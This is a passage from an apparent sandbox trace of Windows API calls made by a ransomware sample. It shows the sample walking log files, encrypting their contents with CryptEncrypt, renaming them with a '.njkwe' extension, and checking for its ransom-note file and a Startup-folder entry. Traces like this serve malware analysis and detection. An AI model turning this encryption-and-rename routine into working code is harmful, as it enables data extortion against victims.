(lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.542] GetTickCount () returned 0x1151087 [0066.542] GetTickCount () returned 0x1151087 [0066.542] GetTickCount () returned 0x1151087 [0066.542] GetTickCount () returned 0x1151087 [0066.542] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.542] GetProcessHeap () returned 0xbe0000 [0066.543] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.543] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.546] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.547] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.547] GetProcessHeap () returned 0xbe0000 [0066.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.547] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.547] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.547] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.547] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.547] CloseHandle (hObject=0x428) returned 1 [0066.550] GetProcessHeap () returned 0xbe0000 [0066.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.550] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.550] GetProcessHeap () returned 0xbe0000 [0066.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.550] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0066.550] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="Windows") returned -1 [0066.550] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="$Recycle.bin") returned 1 [0066.550] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="System Volume Information") returned -1 [0066.550] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="Program Files") returned -1 [0066.550] lstrcmpiW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="Program Files (x86)") returned -1 [0066.550] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 60 [0066.550] StrStrIW (lpFirst="Microsoft-Windows-Known Folders API Service.evtx", lpSrch=".njkwe") returned 0x0 [0066.550] lstrcmpW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.550] lstrcmpW (lpString1="Microsoft-Windows-Known Folders API Service.evtx", lpString2="taridd") returned -1 [0066.551] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.551] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.551] GetTickCount () returned 0x1151087 [0066.551] GetTickCount () returned 0x1151087 [0066.551] GetTickCount () returned 0x1151087 [0066.551] GetTickCount () returned 0x1151087 [0066.551] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.551] GetProcessHeap () returned 0xbe0000 [0066.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.551] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.563] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.563] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.563] GetProcessHeap () returned 0xbe0000 [0066.563] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.563] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.564] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.564] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.564] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.564] CloseHandle (hObject=0x428) returned 1 [0066.566] GetProcessHeap () returned 0xbe0000 [0066.566] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.566] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0066.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.567] GetProcessHeap () returned 0xbe0000 [0066.567] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.567] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0066.567] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="Windows") returned -1 [0066.567] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.567] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.567] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="Program Files") returned -1 [0066.567] lstrcmpiW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.567] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 54 [0066.567] StrStrIW (lpFirst="Microsoft-Windows-LiveId%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.568] lstrcmpW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.568] lstrcmpW (lpString1="Microsoft-Windows-LiveId%4Operational.evtx", lpString2="taridd") returned -1 [0066.568] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.568] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.568] GetTickCount () returned 0x11510a6 [0066.568] GetTickCount () returned 0x11510a6 [0066.568] GetTickCount () returned 0x11510a6 [0066.568] GetTickCount () returned 0x11510a6 [0066.568] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.568] GetProcessHeap () returned 0xbe0000 [0066.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.568] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.570] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.570] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.570] GetProcessHeap () returned 0xbe0000 [0066.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.570] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.570] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.571] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.571] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.571] CloseHandle (hObject=0x428) returned 1 [0066.573] GetProcessHeap () returned 0xbe0000 [0066.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.573] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0066.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.573] GetProcessHeap () returned 0xbe0000 [0066.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.573] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-MUI%4Admin.evtx", cAlternateFileName="MI30D3~1.EVT")) returned 1 [0066.573] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="Windows") returned -1 [0066.573] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.573] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.573] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="Program Files") returned -1 [0066.573] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.573] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 45 [0066.573] StrStrIW (lpFirst="Microsoft-Windows-MUI%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.573] lstrcmpW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.573] lstrcmpW (lpString1="Microsoft-Windows-MUI%4Admin.evtx", lpString2="taridd") returned -1 [0066.574] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.574] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.574] GetTickCount () returned 0x11510a6 [0066.574] GetTickCount () returned 0x11510a6 [0066.574] GetTickCount () returned 0x11510a6 [0066.574] GetTickCount () returned 0x11510a6 [0066.574] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.574] GetProcessHeap () returned 0xbe0000 [0066.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.574] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.576] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.576] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.576] GetProcessHeap () returned 0xbe0000 [0066.576] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.576] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.576] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.576] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.576] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.577] CloseHandle (hObject=0x428) returned 1 [0066.578] GetProcessHeap () returned 0xbe0000 [0066.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.578] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 65 [0066.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.582] GetProcessHeap () returned 0xbe0000 [0066.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.582] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0066.582] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="Windows") returned -1 [0066.582] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.582] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.583] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="Program Files") returned -1 [0066.583] lstrcmpiW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.583] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 51 [0066.583] StrStrIW (lpFirst="Microsoft-Windows-MUI%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.583] lstrcmpW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.583] lstrcmpW (lpString1="Microsoft-Windows-MUI%4Operational.evtx", lpString2="taridd") returned -1 [0066.583] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.583] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.583] GetTickCount () returned 0x11510a6 [0066.583] GetTickCount () returned 0x11510a6 [0066.583] GetTickCount () returned 0x11510a6 [0066.583] GetTickCount () returned 0x11510a6 [0066.583] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.583] GetProcessHeap () returned 0xbe0000 [0066.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.583] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.591] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.591] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.591] GetProcessHeap () returned 0xbe0000 [0066.591] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.591] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.591] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.591] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.591] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.592] CloseHandle (hObject=0x428) returned 1 [0066.594] GetProcessHeap () returned 0xbe0000 [0066.594] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.594] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 71 [0066.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.594] GetProcessHeap () returned 0xbe0000 [0066.594] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.594] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, 